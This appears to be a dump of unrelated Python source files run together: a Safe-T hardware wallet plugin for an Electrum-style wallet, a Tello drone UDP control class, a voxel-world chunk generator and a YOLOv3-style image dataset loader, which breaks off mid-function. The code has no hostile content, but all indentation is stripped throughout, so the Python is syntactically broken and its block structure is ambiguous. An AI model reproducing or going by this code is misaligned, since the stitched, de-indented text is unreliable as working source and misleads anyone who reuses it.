# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
@runs_in_hwd_thread
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Chesscoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
tello.py
|
import socket
import threading
import time
import cv2
from easytello.stats import Stats
class Tello:
def __init__(self, tello_ip: str='192.168.10.1', debug: bool=True):
# Opening local UDP port on 8889 for Tello communication
self.local_ip = ''
self.local_port = 8889
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.local_ip, self.local_port))
# Setting Tello ip and port info
self.tello_ip = tello_ip
self.tello_port = 8889
self.tello_address = (self.tello_ip, self.tello_port)
self.log = []
# Intializing response thread
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = True
self.receive_thread.start()
# easyTello runtime options
self.stream_state = False
self.MAX_TIME_OUT = 15.0
self.debug = debug
# Setting Tello to command mode
self.command()
def send_command(self, command: str, query: bool =False):
# New log entry created for the outbound command
self.log.append(Stats(command, len(self.log)))
# Sending command to Tello
self.socket.sendto(command.encode('utf-8'), self.tello_address)
# Displaying conformation message (if 'debug' os True)
if self.debug is True:
print('Sending command: {}'.format(command))
# Checking whether the command has timed out or not (based on value in 'MAX_TIME_OUT')
start = time.time()
while not self.log[-1].got_response(): # Runs while no repsonse has been received in log
now = time.time()
difference = now - start
if difference > self.MAX_TIME_OUT:
print('Connection timed out!')
break
# Prints out Tello response (if 'debug' is True)
if self.debug is True and query is False:
print('Response: {}'.format(self.log[-1].get_response()))
def _receive_thread(self):
while True:
# Checking for Tello response, throws socket error
try:
self.response, ip = self.socket.recvfrom(1024)
self.log[-1].add_response(self.response)
except socket.error as exc:
print('Socket error: {}'.format(exc))
def _video_thread(self, return_frame_flag):
# Creating stream capture object
cap = cv2.VideoCapture('udp://'+self.tello_ip+':11111')
# Runs while 'stream_state' is True
while self.stream_state:
ret, frame = cap.read()
cv2.imshow('DJI Tello', frame)
if(return_frame_flag == True):
yield frame
# Video Stream is closed if escape key is pressed
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
def wait(self, delay: float):
# Displaying wait message (if 'debug' is True)
if self.debug is True:
print('Waiting {} seconds...'.format(delay))
# Log entry for delay added
self.log.append(Stats('wait', len(self.log)))
# Delay is activated
time.sleep(delay)
def get_log(self):
return self.log
# Controll Commands
def command(self):
self.send_command('command')
def takeoff(self):
self.send_command('takeoff')
def land(self):
self.send_command('land')
def streamon(self,return_frame_flag=False):
self.send_command('streamon')
self.stream_state = True
self.video_thread = threading.Thread(target=self._video_thread(return_frame_flag))
self.video_thread.daemon = True
self.video_thread.start()
def streamoff(self):
self.stream_state = False
self.send_command('streamoff')
def emergency(self):
self.send_command('emergency')
# Movement Commands
def up(self, dist: int):
self.send_command('up {}'.format(dist))
def down(self, dist: int):
self.send_command('down {}'.format(dist))
def left(self, dist: int):
self.send_command('left {}'.format(dist))
def right(self, dist: int):
self.send_command('right {}'.format(dist))
def forward(self, dist: int):
self.send_command('forward {}'.format(dist))
def back(self, dist: int):
self.send_command('back {}'.format(dist))
def cw(self, degr: int):
self.send_command('cw {}'.format(degr))
def ccw(self, degr: int):
self.send_command('ccw {}'.format(degr))
def flip(self, direc: str):
self.send_command('flip {}'.format(direc))
def go(self, x: int, y: int, z: int, speed: int):
self.send_command('go {} {} {} {}'.format(x, y, z, speed))
def curve(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed))
# Set Commands
def set_speed(self, speed: int):
self.send_command('speed {}'.format(speed))
def rc_control(self, a: int, b: int, c: int, d: int):
self.send_command('rc {} {} {} {}'.format(a, b, c, d))
def set_wifi(self, ssid: str, passwrd: str):
self.send_command('wifi {} {}'.format(ssid, passwrd))
# Read Commands
def get_speed(self):
self.send_command('speed?', True)
return self.log[-1].get_response()
def get_battery(self):
self.send_command('battery?', True)
return self.log[-1].get_response()
def get_time(self):
self.send_command('time?', True)
return self.log[-1].get_response()
def get_height(self):
self.send_command('height?', True)
return self.log[-1].get_response()
def get_temp(self):
self.send_command('temp?', True)
return self.log[-1].get_response()
def get_attitude(self):
self.send_command('attitude?', True)
return self.log[-1].get_response()
def get_baro(self):
self.send_command('baro?', True)
return self.log[-1].get_response()
def get_acceleration(self):
self.send_command('acceleration?', True)
return self.log[-1].get_response()
def get_tof(self):
self.send_command('tof?', True)
return self.log[-1].get_response()
def get_wifi(self):
self.send_command('wifi?', True)
return self.log[-1].get_response()
|
world.py
|
from terrain import *
from player import *
from core.renderer import *
import threading
import random
def execute_with_delay(func, delay):
threading.Timer(delay, func).start()
class ThreadedChunkGenerator:
def __init__(self, parent):
self.parent = parent
self.thread = threading.Thread(target=self.generate, daemon=True)
self.thread.start()
def generate(self):
while True:
if(len(self.parent.to_generate)-1) > 0:
chunk = self.parent.to_generate.pop(0)
storage = TerrainMeshStorage(self.parent.parent)
chunk.generate(storage)
chunk.process()
self.parent.parent.add(storage.vertices, storage.texCoords)
del storage
class World:
def __init__(self, renderer, player):
self.parent = renderer
self.chunks = {}
self.blocks = {}
self.position = (0 * 16, 0 * 16)
self.render_distance = 3
self.infgen_threshold = 1
self.block_types = all_blocks(renderer)
self.to_generate = []
self.player = player
self.generator = ThreadedChunkGenerator(self)
def block_exists(self, position):
return position in self.blocks
def _add_chunk(self, position):
self.chunks[position] = Chunk(self.parent, self, position)
self.to_generate.append(self.chunks[position])
def add_chunk(self, position):
execute_with_delay(lambda: self._add_chunk(position), random.randrange(1, 2))
def generate(self):
for i in range(self.position[0] - self.render_distance, self.position[0] + self.render_distance + 1):
for j in range(self.position[1] - self.render_distance, self.position[1] + self.render_distance + 1):
if (i, j) not in self.chunks:
self.add_chunk((i, j))
def update_infgen(self, position):
player_pos = (position[0] // 16, position[2] // 16)
if player_pos[0] - self.position[0] > self.infgen_threshold:
self.position = (self.position[0] + 1, self.position[1])
self.generate()
elif player_pos[0] - self.position[0] < -self.infgen_threshold:
self.position = (self.position[0] - 1, self.position[1])
self.generate()
if player_pos[1] - self.position[1] > self.infgen_threshold:
self.position = (self.position[0], self.position[1] + 1)
self.generate()
elif player_pos[1] - self.position[1] < -self.infgen_threshold:
self.position = (self.position[0], self.position[1] - 1)
self.generate()
def render(self):
self.parent.render()
self.update_infgen(self.player.pos)
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in ' + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False):
try:
path = str(Path(path)) # os-agnostic
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes (wh)
sp = path.replace('.txt', '.shapes') # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[i] for i in i]
self.label_files = [self.label_files[i] for i in i]
self.shapes = s[i] # wh
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 64.).astype(np.int) * 64
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path
x = list(np.load(np_labels_path, allow_pickle=True))
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
